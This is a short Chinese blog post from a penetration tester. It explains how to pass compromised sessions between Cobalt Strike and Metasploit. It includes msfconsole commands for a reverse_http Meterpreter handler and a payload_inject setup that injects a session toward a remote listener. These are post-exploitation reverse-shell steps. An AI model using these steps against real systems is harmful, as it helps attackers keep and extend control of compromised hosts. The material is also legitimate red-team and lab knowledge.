Cobaltstrike与MSF会话派生

Cobaltstrike与MSF会话派生

  一般在渗透的过程中,Get到shell之后一般来说我喜欢上线到Cobaltstrike,但是Cobaltstrike的会话是60S更新一次,有时候功能也并没有MSF完善,那么今天记录一下如何实现Cobaltstrike与MSF的联动。

  Cobaltstrike派生会话

  1.msf创建监听
msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp 
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_http 
payload => windows/meterpreter/reverse_http 
msf6 exploit(multi/handler) > set lhost 192.168.37.134 
lhost => 192.168.37.134 
msf6 exploit(multi/handler) > set lport 8088 
lport => 8088 
msf6 exploit(multi/handler) > run -j

  2.cs新建一个监听器,地址为msf地址,端口为msf的监听端口

  3.在 cs的现有会话上增加会话

  4.选择刚刚建立的监听器

  此时msf中就会出现session

 

  Metasploit派生会话

   如果Metasploit已经获取到了一个会话,可以通过payload_inject模块进行会话派生,将会话传递到Cobaltstrike。

  1.首先在cs中开启监听

  2.msf配置。

use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set DisablePayloadHandler true   #默认情况下,payload_inject执行之后会在本地产生一个新的handler,由于我们已经有了一个,所以不需要在产生一个,所以这里我们设置为true
set lhost x.x.x.x               #cobaltstrike监听的ip
set lport 6789                 #cobaltstrike监听的端口 
set session 1                   #这里是获得的session的id
exploit

  3.返回CS查看反弹成功。 

 

 

posted @ 2021-11-28 22:59  小小小怪将军  阅读(757)  评论(0编辑  收藏  举报